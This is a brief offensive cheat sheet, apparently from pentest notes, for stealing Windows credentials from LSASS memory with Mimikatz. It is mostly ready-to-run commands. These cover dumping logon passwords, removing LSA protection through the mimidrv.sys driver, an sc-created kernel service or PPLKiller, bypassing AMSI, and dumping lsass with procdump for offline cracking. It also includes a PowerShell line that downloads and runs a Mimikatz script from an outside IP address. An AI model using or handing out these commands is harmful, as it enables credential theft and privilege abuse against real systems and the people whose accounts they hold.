Mimikatz Abusing Kerberos
To extract credentials from memory due to caching requirements of the Kerberos protocol
Mimikatz
We need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target Local Security Authority Subsystem Service (LSASS)
whoami /priv
mimikatz.exe
sekurlsa::logonpasswords
Disable Protected Processes Light (PPL) if error
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
reg query hklm\SYSTEM\CurrentControlSet\Control\Lsa -v RunAsPPL
We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers.
We can load mimidrv.sys driver to disable PPL. (upload to victim and place in the same dir of mimikatz) *noisy*
!+
!processprotect /process:lsass.exe /remove
Alternative way to load
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
diable amsi
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
PPLKiller.exe /installDriver
PPLKiller.exe /disableLSAProtection
PPLKiller.exe /uninstallDriver
Offline processing (no mimikatz in victim)
Mimikatz processing victim lsass.exe's dump in attacker machine
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Create dump with GUI

Create dump in command line
-ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe lsass.dmp
Last updated